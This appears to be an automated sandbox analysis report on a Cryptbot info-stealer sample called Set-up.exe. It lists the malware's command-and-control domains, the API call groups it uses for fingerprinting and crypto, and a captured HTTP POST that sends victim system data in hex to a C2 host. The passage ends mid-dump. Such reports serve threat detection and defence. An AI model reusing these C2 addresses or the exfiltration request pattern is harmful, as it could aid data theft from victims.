Click to jump to signature section
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4 | Avira URL Cloud: Label: malware |
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm | Avira URL Cloud: Label: malware |
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0 | Avira URL Cloud: Label: malware |
Source: home.thirttj13vs.top | Avira URL Cloud: Label: malware |
Source: indohome.thirttj13vs.top | Avira URL Cloud: Label: malware |
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221 | Avira URL Cloud: Label: malware |
Source: Set-up.exe.4764.0.memstrmin | Malware Configuration Extractor: Cryptbot {"C2 list": ["indohome.thirttj13vs.top", "homettj13vsj13vs.top", "thirttj13vsj13vs.top", "home.thirttj13vs.top"]} |
Source: Submited Sample | Integrated Neural Analysis Model: Matched 95.4% probability |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_01008E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, | 0_2_01008E90 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_01153F30 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func, | 0_2_01153F30 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00EBF6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext, | 0_2_00EBF6E0 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00EC1B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext, | 0_2_00EC1B40 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00EC1F10 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError, | 0_2_00EC1F10 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_00CADCF0 |
Source: Set-up.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- | |
Source: Set-up.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: Set-up.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64, | 0_2_00C8255D |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64, | 0_2_00C829FF |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00E5E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno, | 0_2_00E5E270 |
Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64, | 0_2_00C8255D |
Source: Malware configuration extractor | URLs: indohome.thirttj13vs.top |
Source: Malware configuration extractor | URLs: homettj13vsj13vs.top |
Source: Malware configuration extractor | URLs: thirttj13vsj13vs.top |
Source: Malware configuration extractor | URLs: home.thirttj13vs.top |
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */* |
Source: global traffic | HTTP traffic detected: POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 562088Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 34 33 32 33 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 7 |